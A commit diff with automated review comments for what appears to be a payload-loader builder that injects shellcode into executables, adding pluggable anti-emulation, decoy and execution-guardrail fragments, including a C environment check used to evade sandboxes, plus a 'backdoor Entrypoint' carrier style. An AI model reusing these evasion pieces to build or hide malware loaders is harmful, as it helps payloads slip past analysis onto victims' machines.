+
- {% if is_64 %}
- x64: {{ is_64 }}
- {% else %}
-
x64: {{ is_64 }}
- {% endif %}
- / Dotnet: {{ is_dotnet}}
- .text: {{ code_sect_size}}
- .rdata: {{ data_sect_size}}
- (max: {{ data_sect_largest_gap_size}})
- {% if not has_rodata_section %}
-
No .rdata section
- {% endif %}
+
EXE Info:
+
+ -
+ {% if is_64 %}
+ x64: {{ is_64 }}
+ {% else %}
+ x64: {{ is_64 }}
+ {% endif %}
+
+
+ -
+ Dotnet: {{ is_dotnet}}
+
+
+ -
+ .text: {{ code_sect_size}}
+
+
+ -
+ .rdata: {{ data_sect_size}}
+ (max: {{ data_sect_largest_gap_size}})
+
+
+ {% if not has_rodata_section %}
+ -
+ No .rdata section
+
+ {% endif %}
+
{% if unresolved_dlls|length > 0 %}
@@ -108,37 +141,59 @@
{% endfor %}
{% endif %}
+
-
-
+
+
-
+
-
-
+
-
-
-
+
+
diff --git a/app/views_project.py b/app/views_project.py
index 5cc6989..53d2fe7 100644
--- a/app/views_project.py
+++ b/app/views_project.py
@@ -102,6 +102,10 @@ def project(name):
carrier_invoke_styles = [(color.name, color.value) for color in CarrierInvokeStyle]
payload_locations = [(color.name, color.value) for color in PayloadLocation]
+ guardrail_styles = list_files(PATH_GUARDRAILS)
+ antiemulation_styles = list_files(PATH_ANTIEMULATION)
+ decoy_styles = list_files(PATH_DECOY)
+
return render_template('project.html',
project_name = name,
project=project,
@@ -128,6 +132,10 @@ def project(name):
has_remote=has_remote,
fix_missing_iat=project.settings.fix_missing_iat,
+
+ guardrailstyles = guardrail_styles,
+ antiemulationstyles = antiemulation_styles,
+ decoystyles = decoy_styles,
)
@@ -145,6 +153,16 @@ def list_files_and_sizes(directory, prepend=""):
return files_and_sizes
+def list_files(directory, prepend="") -> List[str]:
+ files = []
+ for filename in os.listdir(directory):
+ filepath = os.path.join(directory, filename)
+ if os.path.isfile(filepath):
+ filename = filename.replace(".c", "")
+ files.append(filename)
+ return files
+
+
@views_project.route("/project_add", methods=['POST', 'GET'])
def add_project():
if request.method == 'POST':
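Review bot: `filename.replace(".c", "")` in the new `list_files` strips every occurrence of `.c`, not only the extension (a constructed example: `anti.cpu.c` becomes `antipu`), and files without a `.c` extension are returned as well, so the names handed to the UI are not guaranteed to map back to the `<name>.c` file that phases/templater.py later reopens. Filtering on the suffix and slicing it off fixes both: `if os.path.isfile(filepath) and filename.endswith(".c"):` followed by `files.append(filename[:-2])`. The `-> List[str]` annotation requires `List` from `typing` to be imported somewhere in this file, which the diff does not show; `list[str]` would avoid that dependency if the project targets 3.9+. A one-line docstring, e.g. `"""Return the stem names of the .c plugin files in *directory*."""`, would help, and the `prepend` parameter is accepted but never used in the body.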
@@ -177,8 +195,16 @@ def add_project():
settings.fix_missing_iat = True if request.form.get('fix_missing_iat') != None else False
- carrier_name = request.form['carrier_name']
- settings.carrier_name = carrier_name
+ settings.carrier_name = request.form['carrier_name']
+
+ settings.plugin_antiemulation = request.form['antiemulation']
+ settings.plugin_decoy = request.form['decoy']
+ settings.plugin_guardrail = request.form['guardrail']
+ logger.info("E: {} D: {} G: {}".format(
+ settings.plugin_antiemulation,
+ settings.plugin_decoy,
+ settings.plugin_guardrail
+ ))
carrier_invoke_style = request.form['carrier_invoke_style']
settings.carrier_invoke_style = CarrierInvokeStyle[carrier_invoke_style]
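Review bot: The three form values stored into `settings.plugin_antiemulation`, `settings.plugin_decoy` and `settings.plugin_guardrail` are taken verbatim from the request and later concatenated into file paths (`PATH_GUARDRAILS + "{}.c".format(settings.plugin_guardrail)` in the phases/templater.py hunk, and by the look of the surrounding lines the same pattern for the other two), so a value containing a path separator selects a file outside the plugin directory and its contents are read into the generated C source. The accepted values should be restricted to what the UI offers, and this file already computes that allowlist via `list_files`: `if settings.plugin_guardrail not in list_files(PATH_GUARDRAILS): abort(400)` (Flask's `abort`, or whatever error path this module already uses), and likewise for the other two fields. Note also that `request.form['guardrail']` raises a `BadRequestKeyError` (HTTP 400) when the field is absent, whereas the `fix_missing_iat` line just above tolerates a missing key via `.get`; decide which behaviour is intended for forms that predate the new fields. add_project continues past the end of this hunk.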
diff --git a/data/source/carrier/alloc_rw_rx/template.c b/data/source/carrier/alloc_rw_rx/template.c
index 5b95a5b..04dccd4 100644
--- a/data/source/carrier/alloc_rw_rx/template.c
+++ b/data/source/carrier/alloc_rw_rx/template.c
@@ -20,18 +20,6 @@ char *supermega_payload;
int main()
{
- // Execution Guardrail: Env Check
- wchar_t envVarName[] = L"USERPROFILE";
- wchar_t tocheck[] = L"C:\\Users\\";
- WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
- DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
- if (result == 0) {
- return 6;
- }
- if (mystrcmp(buffer, tocheck) != 0) {
- return 6;
- }
-
// Depends on plugin_antiemulation
antiemulation();
diff --git a/data/source/guardrails/env.c b/data/source/guardrails/env.c
new file mode 100644
index 0000000..17741f8
--- /dev/null
+++ b/data/source/guardrails/env.c
@@ -0,0 +1,11 @@
+ // Execution Guardrail: Env Check
+ wchar_t envVarName[] = L"USERPROFILE";
+ wchar_t tocheck[] = L"C:\\Users\\";
+ WCHAR buffer[1024]; // NOTE: Do not make it bigger, or we have a __chkstack() dependency!
+ DWORD result = GetEnvironmentVariableW(envVarName, buffer, 1024);
+ if (result == 0) {
+ return 6;
+ }
+ if (mystrcmp(buffer, tocheck) != 0) {
+ return 6;
+ }
\ No newline at end of file
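Review bot: env.c carries no indication that it is a fragment rather than a translation unit — it has `return 6;` at file scope and depends on `mystrcmp` and the Windows API declarations of whatever file it is spliced into (phases/templater.py reads it and passes it to the template as `plugin_guardrails`). A one-line header would save the next reader a trip through the templater: `// Fragment spliced into the carrier's main() by phases/templater.py; not a standalone translation unit.` A short comment on what exit code 6 signals to the caller would also help, since the value appears twice without explanation.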
diff --git a/data/source/guardrails/none.c b/data/source/guardrails/none.c
new file mode 100644
index 0000000..e69de29
diff --git a/model/defs.py b/model/defs.py
index f8ee147..daba564 100644
--- a/model/defs.py
+++ b/model/defs.py
@@ -17,6 +17,7 @@ PATH_PAYLOAD = "data/source/payload/"
PATH_DECODER = "data/source/decoder/"
PATH_ANTIEMULATION = "data/source/antiemulation/"
PATH_DECOY = "data/source/decoy/"
+PATH_GUARDRAILS = "data/source/guardrails/"
PATH_WEB_PROJECT = "projects/"
@@ -30,13 +31,13 @@ class DecoderStyle(Enum):
class PayloadLocation(Enum):
- CODE = "code"
- DATA = "data"
+ CODE = ".text"
+ DATA = ".rdata"
class CarrierInvokeStyle(Enum):
ChangeEntryPoint = "change EntryPoint"
- BackdoorCallInstr = "hijack Main"
+ BackdoorCallInstr = "backdoor Entrypoint"
class FunctionInvokeStyle(Enum):
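Review bot: Changing `PayloadLocation.CODE`/`DATA` to `".text"`/`".rdata"` and `BackdoorCallInstr` to `"backdoor Entrypoint"` changes what `.value` yields; the views_project.py hunk exposes `(name, value)` pairs to the template and add_project resolves the posted field by name (`CarrierInvokeStyle[carrier_invoke_style]`), so the form round-trip should survive. Anything that stores or compares the raw value strings — persisted project settings, or template conditionals on the old `"code"`/`"data"` literals — would not, and the diff does not show whether such uses exist; worth a search for the old literals before merging. A comment on the enum documenting the new meaning would help, e.g. `# value is the PE section the payload is placed in, as shown in the UI`.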
diff --git a/model/settings.py b/model/settings.py
index 35817b9..2dc8fbd 100644
--- a/model/settings.py
+++ b/model/settings.py
@@ -16,6 +16,7 @@ class Settings():
self.plugin_antiemulation = "none"
self.plugin_decoy = "none"
+ self.plugin_guardrail = "none"
self.dllfunc: str = "" # For DLL injection
diff --git a/phases/templater.py b/phases/templater.py
index e23cb03..44c0185 100644
--- a/phases/templater.py
+++ b/phases/templater.py
@@ -27,7 +27,13 @@ def create_c_from_template(settings: Settings, payload_len: int):
PATH_DECODER, settings.main_c_path))
plugin_decoder = ""
- # Decoder
+ # Plugin: Execution Guardrails
+ filepath_guardrails = PATH_GUARDRAILS + "{}.c".format(
+ settings.plugin_guardrail)
+ with open(filepath_guardrails, "r", encoding='utf-8') as file:
+ plugin_guardrails = file.read()
+
+ # Plugin: Decoder
filepath_decoder = PATH_DECODER + "{}.c".format(
settings.decoder_style.value)
with open(filepath_decoder, "r", encoding='utf-8') as file:
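Review bot: The new local is named `plugin_guardrails` (plural) while the setting it is derived from is `settings.plugin_guardrail` and the form field is `guardrail`; the other locals in this function follow the singular `plugin_<name>` pattern (`plugin_decoder`, `plugin_decoy`), so `plugin_guardrail` for the local and the template key would read consistently. The comment `# Plugin: Execution Guardrails` could state what the fragment is, e.g. `# Plugin: Execution Guardrails — C statement fragment inserted into the carrier's main()`, since nothing here says the file is not a full source unit. create_c_from_template begins before this hunk and continues after it.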
@@ -48,7 +54,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
filepath_decoy = PATH_DECOY + "{}.c".format(
settings.plugin_decoy)
with open(filepath_decoy, "r", encoding='utf-8') as file:
- plugin_decoy = file.read()
+ plugin_decoy = file.read()
# Choose template
dirpath = PATH_CARRIER + settings.carrier_name + "/template.c"
@@ -61,6 +67,7 @@ def create_c_from_template(settings: Settings, payload_len: int):
'plugin_decoder': plugin_decoder,
'plugin_antiemulation': plugin_antiemualation,
'plugin_decoy': plugin_decoy,
+ 'plugin_guardrails': plugin_guardrails,
'PAYLOAD_LEN': payload_len,
})
with open(settings.main_c_path, "w", encoding='utf-8') as file:
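Review bot: The new `'plugin_guardrails'` key only has an effect if the carrier template contains a matching `{{ plugin_guardrails }}` placeholder, and the data/source/carrier/alloc_rw_rx/template.c hunk in this commit only removes the inline env check without adding such a placeholder in its visible lines; unless it is added outside that hunk (or the other carrier templates already carry it), selecting a guardrail in the UI silently produces a carrier with no guardrail at all. A comment next to the key pinning that contract would make the dependency explicit: `# must match the {{ plugin_guardrails }} placeholder in every data/source/carrier/*/template.c`. create_c_from_template begins before this hunk and continues after it.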